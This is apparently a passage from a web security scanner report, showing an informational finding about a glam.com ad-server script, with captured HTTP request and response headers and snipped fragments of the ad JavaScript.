HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Type: application/x-javascript Set-Cookie: bkpix2=1; expires=Mon, 21 Mar 2011 22:15:30 GMT; path=/; domain=.glam.com; X-Powered-By: PHP/5.1.6 P3P: policyref="http://www Vary: Accept-Encoding Cache-Control: max-age=450 Date: Mon, 21 Mar 2011 16:42:10 GMT Connection: close Content-Length: 55384 // <!-- [gnetGeneratedTime]=[Mon Mar 21 2011 9:38:14 PDT] --> // <!-- [gnetCachedTime]=[Mon Mar 21 2011 9:40:13 PDT] --> window.glam_session = new Object(); window.glam_session /* */ window.glam_session.edge = true; window.glam_session.glam window.glam_session.ctags window.glam_session window.glam_session.dma= window.glam_session window.glam_session.sid window.glam_sessi ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11266129786 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d9a61c18c39e371e68f X-Glam-Bdata: XGlamBData,nbt,lda,ln X-Glam-AdId: 5000033641 X-Glam-Euid: 9a3cf32c10385c9cebc7 X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 21 Mar 2011 16:42:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 21 Mar 2011 16:42:12 GMT Connection: close Content-Length: 4272 ...[SNIP]... iateInfo ) { window.GlamGetAffili var glam_info = new Object(); var glam_affiliate_vars = 'js_mode=show;_ge_=3^2 ...[SNIP]... |